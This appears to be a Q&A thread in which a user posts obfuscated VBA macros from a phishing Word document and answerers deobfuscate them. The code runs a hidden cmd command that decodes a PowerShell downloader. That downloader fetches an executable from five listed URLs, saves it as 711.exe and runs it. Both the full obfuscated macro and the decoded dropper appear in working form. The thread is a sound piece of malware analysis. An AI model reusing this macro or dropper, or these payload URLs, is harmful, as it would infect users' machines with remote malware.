# What does this Visual Basic code do? Microsoft word macro

Tags: vba, ms-word, virus

I received an email with a word document that had some built in macros. I disabled them and checked them out. The code all looks like gibberish, but maybe someone else can help me figure out what it's doing?

This is on Microsoft word objects:

```
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "zFpiVaXZHXwfhz" + "U" + "2692" + "Zt"
   Second "uqwSRYVhz" + "387021345" + "kzB" + "8730"
   Second "kz" + "1499" + "tkAh" + "p"
   Second "P" + "8389"
   Second "4180" + "jmCmdHzM" + "IcRbPsSnK" + "bWtnR"
   Second "357881955" + "3117" + "ijHmwpiFZCcjw" + "bvt"
Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)
   Second "pqENJzbA" + "208599822" + "Ovav" + "A"
   Second "HmjZtUmz" + "7073"
   Second "hYRErMnn" + "4277"
End Sub
```

This is on Modules:

```
Function KlXaMrm()

On _
Error _
Resume _
Next
Second "IVozFsCNdj" + "muE"
   Second "wwrMmsOX" + "ii"
   Second "7048" + "RLBLOvif"
   Second "315289259" + "bGl" + "wcZUd" + "8842"
bkzhl = Format(Chr(9 + 16 + 4 + 2 + 68)) + "md /V" + "^:O/" + Format(Chr(6 + 11 + 3 + 1 + 46)) + Format(Chr(3 + 5 + 1 + 0 + 25)) + "^" + "s^" + "e^" + "t ^WvU^" + "y=^  " + " ^  ^ " + "^   " + "^   ^ "
Second "IWV" + "FalMBYmN" + "6772" + "vIi"
   Second "BfMwfQziXwj" + "fvQGQha"
   Second "hBcrV" + "380436099"
ipaSHnJ = " " + "^ ^ ^ " + "}" + "}" + "^{" + "^h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^" + "ta" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "};" + "^k^a^"
Second "31392559" + "BMS"
kVaBhn = "e" + "r^b;Yu" + "r^$ " + "^m^e^tI" + "^-e" + "k" + "o" + "vnI^;"
Second "965" + "5880" + "XJTdjHJSV" + "Abrh"
HzutiHjFO = ")Y^u" + "r^" + "$ ^,^pN" + "B^" + "$" + "(^eliF" + "d"
Second "E" + "5438"
   Second "MhjZXFtjz" + "52832268"
zBPwbjSP = "^a" + "^olnwoD" + ".j^" + "p^X$^{^" + "yr"
Second "oWcn" + "1454"
   Second "UmZTRVGRUadD" + "7070" + "Hb" + "Z"
   Second "GiNa" + "EjiBfz"
   Second "ZLiR" + "iSRc" + "LaHCfQjrI" + "467392171"
   Second "376971481" + "ATq"
wZvZZZCL = "^t{" + ")" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi$^" + " n^i" + "^" + " ^pN" + "B^$(h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^a" + "^e" + "r^o^f^;" + "'" + "^e^x^e"
Second "1426" + "2730" + "131359904" + "2661"
   Second "tZ" + "A"
FVkwvLXivOm = "^.^'+^f" + "aw" + "^$+" + "'\'^+" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "i^" + "l" + "^" + "b^u^p:v"
Second "obmhCVWdl" + "1876"
LEFDwJt = "n" + "e^$^=Y" + "^ur^$;'" + "^1^" + "1^7" + "^' =^ " + "f^aw$;" + ")^'@^" + "'(" + "t" + "ilp^S.^"
Second "mHz" + "2845" + "swVQqO" + "sTaM"
   Second "151506295" + "9519"
   Second "530531760" + "421003665" + "33902179" + "zE"
UjhKfLskOAw = "'^" + "D^GoP/" + "m" + "^o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "^t"
Second "1424" + "AS" + "qWRt" + "jTfL"
   Second "144" + "385570591" + "YNItdvcRQLGKl" + "273801574"
   Second "8474" + "427918883" + "101014623" + "2181"
oHsEGJKpH = "^o" + "^p^" + "sno" + "r^i" + "//:p^t" + "t^h^@j" + "fW^FVF^" + "8r/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "e^u" + "v" + "^"
Second "LIdEK" + "9208"
   Second "GHY" + "w"
   Second "licB" + "57965560" + "BkiEX" + "uNEQdXXBb"
wIVBCzu = "ero^o^" + "b" + "a^keep" + "/" + "/^:^p^"
KlXaMrm = bkzhl + ipaSHnJ + kVaBhn + HzutiHjFO + zBPwbjSP + wZvZZZCL + FVkwvLXivOm + LEFDwJt + UjhKfLskOAw + oHsEGJKpH + wIVBCzu
   Second "kmpQXLAuN" + "fh" + "365194270" + "n"
   Second "70996280" + "nJ"
   Second "QTviGhI" + "RV" + "315865801" + "UcJFQ"
End Function
Function bMdNCkVCVn()

On _
Error _
Resume _
Next
Second "FddKlw" + "OTSBodYZZ"
PpRpwRnf = "tth^" + "@uj^l^" + "h^o" + "/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.^" + "gn" + "^it" + "nia^p"
Second "wCkfREKOG" + "AfRUmpAd" + "WL" + "GICb"
   Second "rBzjjYzi" + "zL"
LOkOMzwwZEb = "m^ot^su" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ra" + "^" + "t^sen^" + "o" + "^l//^:" + "p^t^t" + "h"
Second "rlTmjU" + "jYwjHViv" + "dqjiW" + "c"
   Second "WHUDRQuddUoQr" + "lIcDDYCTjsUVWs" + "4956" + "mJ"
   Second "9262" + "171867944" + "464524065" + "7760"
WnITU = "^@u^A" + "/^ur.^m" + "b^s-t" + "^evs^" + "s" + "^ar" + "//^:p^t" + "th" + "@^F^p2G" + "^zx^W/^"
Second "184947357" + "wjOV"
   Second "5399" + "jwuBT"
   Second "402560265" + "449" + "l" + "BBBuHZnMK"
   Second "MrA" + "nMwkzNbY" + "429759967" + "bqC"
WsfkNBcA = "mo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.k" + "ro" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ege" + "l^lo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "sn" + "i" + "^t" + "r^a^mt^" + "s//" + ":p" + "^t" + "^"
Second "534498195" + "HX" + "vwKkqLAvKmm" + "279702571"
   Second "KYJPBi" + "ivTUzZOfj" + "162850888" + "WbZ"
RqVln = "th'^=" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi^$" + ";^" + "t" + "n^e^i" + "^l" + Format(Chr(6 + 11 + 3 + 1 + 46)) + "be^W" + "^.t^e" + "N^ t" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ejb^o" + "-^w^e" + "n=" + "^j" + "pX^"
Second "fbvS" + "F"
   Second "BmJt" + "Y"
   Second "z" + "qlRwULuPK" + "NE" + "2370"
   Second "467432993" + "510382039" + "V" + "357745589"
TTWnMmnb = "$ ll^e" + "h^s" + "r^e^w^" + "o^p" + "&&" + "^f^o"
Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
   Second "Gs" + "qiWjuwsKkDzj"
   Second "w" + "iZv" + "ri" + "jbl"
HuAjss = "r /L" + " %^5" + " ^" + "in (^" + "37" + "^3,-" + "^1,^0)^" + "do s^e^" + "t" + " 3^1=!3"
Second "IIz" + "pwb" + "OiIRoWEPKvRSu" + "fLYzMV"
   Second "I" + "5470" + "uC" + "vzYpG"
   Second "Prm" + "D"
vWYHrcNLA = "^" + "1!!" + "^WvU^y" + ":~%^5" + ",1!&" + "&i" + "^" + "f %^5" + "=^=^0" + " " + Format(Chr(9 + 16 + 4 + 2 + 68)) + "a^l^l"
Second "QqFfMn" + "mmslG"
fGbIAE = " " + "%3^1:" + "*^" + "3^1^" + "!^"
bMdNCkVCVn = PpRpwRnf + LOkOMzwwZEb + WnITU + WsfkNBcA + RqVln + TTWnMmnb + HuAjss + vWYHrcNLA + fGbIAE
   Second "kWluI" + "lFK"
   Second "FoYWtEQUo" + "SPqoT" + "m" + "1515"
   Second "QHGQ" + "f"
End Function
Function zZZwVld()

On _
Error _
Resume _
Next
Second "15045220" + "Cfku" + "finOQwh" + "mUISHvGpDwIp"
   Second "297480629" + "wXWqc"
   Second "RJ" + "1178" + "XfKGfw" + "znaVlIj"
sFjEfzuO = "=%" + Format(Chr(3 + 5 + 1 + 0 + 25)) + "  " + ""
zZZwVld = sFjEfzuO
   Second "7008" + "530276898"
End Function
```

I'm guessing this is malicious, but I'm not too familiar with Visual Basic. I'm also not sure if this is the right place to be asking about this.

Answer (score 3, accepted):

All lines that begin with `Second` is noise that causes a runtime error and does nothing. They only exist to confuse the antivirus.

If you remove them all, you are left with a bunch of string assignments. They all add up to the following string in the end:

```
cmd /V^:O/C"^s^e^t ^WvU^y=^   ^  ^ ^   ^   ^  ^ ^ ^ }}^{^hc^tac};^k^a^er^b;Yur^$ ^m^e^tI^-ekovnI^;)Y^ur^$ ^,^pNB^$(^eliFd^a^olnwoD.j^p^X$^{^yr^t{)c^oi$^ n^i^ ^pNB^$(hc^a^er^o^f^;'^e^x^e^.^'+^faw^$+'\'^+ci^l^b^u^p:vne^$^=Y^ur^$;'^1^1^7^' =^ f^aw$;)^'@^'(tilp^S.^'^D^GoP/m^oc.^t^o^p^snor^i//:p^tt^h^@jfW^FVF^8r/m^oc.e^uv^ero^o^ba^keep//^:^p^tth^@uj^l^h^o/m^oc^.^gn^itnia^pm^ot^sucra^t^sen^o^l//^:p^t^th^@u^A/^ur.^mb^s-t^evs^s^ar//^:p^tth@^F^p2G^zx^W/^moc^.krocegel^locsni^tr^a^mt^s//:p^t^th'^=c^oi^$;^tn^e^i^lCbe^W^.t^eN^ tcejb^o-^w^en=^jpX^$ ll^eh^sr^e^w^o^p&&^f^or /L %^5 ^in (^37^3,-^1,^0)^do s^e^t 3^1=!3^1!!^WvU^y:~%^5,1!&&i^f %^5=^=^0 ca^l^l %3^1:*^3^1^!^=%"
```

This is a shell command that runs `cmd` with switches `/V:O` and `/C:"<obfuscated command>"`.
All carets can be deleted from it, because all they do is instruct `cmd` to treat the next character literally.

The obfuscated command saves a reversed Powershell script in a variable, [reverses it back](https://stackoverflow.com/q/30143520/11683) at runtime and launches.

The Powershell script that ends up executing is:

```
$Xpj=new-object Net.WebClient;
$ioc='http://stmartinscollegecork.com/WxzG2pF@http://rassvet-sbm.ru/Au@http://lonestarcustompainting.com/ohlju@http://peekaboorevue.com/r8FVFWfj@http://ironspot.com/PoGD'.Split('@');
$waf='711';
$ruY=$env:public + '\' + $waf + '.exe';
foreach($BNp in $ioc) {
    try {
        $Xpj.DownloadFile($BNp, $ruY);
        Invoke-Item $ruY;
        break;
    }catch{}
}
```

It tries to download a file from each of the specified urls, save it into the [public folder](https://www.computerperformance.co.uk/powershell/environmental-variables/) as `711.exe` and run it. It stops at the first successful run.

Comment: Interesting, this is the first time I've looked into how something from a phishing email is working. I supposed even though I didn't allow the macros, I would have been fine since I was running this from OSX which won't be able to run `.exe`

Comment: @greenthumbtack On OSX, it would have failed at trying to run `cmd`.

Comment: @greenthumbtack - the reversing of the string and the `Format(Chr(9 + 16 + 4 + 2 + 68))` which equals to `c` are really nice ideas.

Answer (score 3):

**Delete it!**

The code gets activated, whenever you open your document. It seems like some kind of a virus indeed. **It is a malicious.** If you wanna see what it does, replace the following line:

`Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)`

with:

`MsgBox KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)`

and see the `MsgBox()`. **Or better delete it**, there could be some other code somewhere  else, which is calling some `Shell` command as well. And then you would most probably need to reinstall your PC.

Comment: Alright, thank you! I'll run it on a VM and see what happens

Comment: @greenthumbtack I would *strongly* advise against running it **at all**.  Working in Notepad (tip:  All of the `Second` lines are junk data to obfuscate the code, and can be discarded) this (eventually) turns into a command line program to reverse and run a string, which (once reversed) is a PowerShell script to download and run a program from the internet without your permission

Comment: @greenthumbtack - it is a **bit dangerous** to do it. At least, before running, make sure that you only have the `Shell` command really once. And this once is the one that you have changed to `MsgBox()`. So, no `Shell` should be present.

Comment: @Chronocidal - where is the reverse part? I cannot find it.

Comment: What does 'Second' mean? I was looking for any documentation about that keyword and can't find anything

Comment: @greenthumbtack - it is used for obfuscation. Just ignore it. It produces an error, which gets ignored by the `On Error Resume Next`  part. - https://www.excelfunctions.net/vba-second-function.html

Comment: @Vityata Right at the end, after the first "&&" - it starts `for /L %5 in`

Comment: @Chronocidal - I see. I was actually expecting `StrReverse()` in the VBA code, it is done a bit better.